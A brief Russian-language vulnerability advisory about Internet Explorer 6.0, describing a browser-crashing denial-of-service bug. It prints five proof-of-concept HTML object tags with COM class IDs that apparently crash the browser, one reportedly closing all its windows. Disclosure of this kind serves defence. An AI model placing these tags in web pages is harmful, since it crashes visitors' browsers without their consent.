Программа: Microsoft Internet Explorer 6.0
Уязвимость обнаружена в Microsoft Internet Explorer.
Удаленный пользователь может аварийно
завершить работу браузера. Уязвимость
обнаружена в NetWork Connections Tray классе.
Удаленный атакующий может представить
специально обработанный тэг object, чтобы
аварийно завершить работу браузера.
Пример/Эксплоит:
<object
classid="clsid:7007ACCF-3202-11D1-AAD2-00805FC1270E">
</object>
=====================
Class SysTray:
<object
classid="clsid:35CEC8A3-2BE6-11D2-8773-92E220524153"
>>
</object>
=====================
Class SysTrayInvoker: (Вообще все окна IE убивает)
<object
classid="clsid:730F6CDC-2C86-11D2-8773-92E220524153"
>>
</object>
======================
Class OutlookExpress Adress Book:
<object
classid="clsid:233A9694-667E-11D1-9DFB-006097D50408"
>>
</object>
======================
Class Сеть и уд. доступ к сети:
<object
classid="clsid:7007ACC7-3202-11D1-AAD2-00805FC1270E"
>>
</object>
========================
Вообщем DoS-ов таких 100-ни.....
